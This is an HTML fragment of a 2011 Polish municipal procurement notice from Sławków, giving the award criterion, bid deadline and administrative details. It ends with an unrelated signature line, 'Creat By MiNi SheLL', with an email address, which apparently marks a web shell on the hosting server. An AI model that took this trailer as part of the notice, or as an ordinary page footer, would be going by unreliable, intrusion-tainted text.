<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.umslawkow.finn.pl/  zakładka zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Sławków
41-260 Sławków, ul. Łosińska 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2011 godzina 10:00, miejsce: Urząd Miasta Sławków
41-260 Sławków, ul. Rynek 1 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com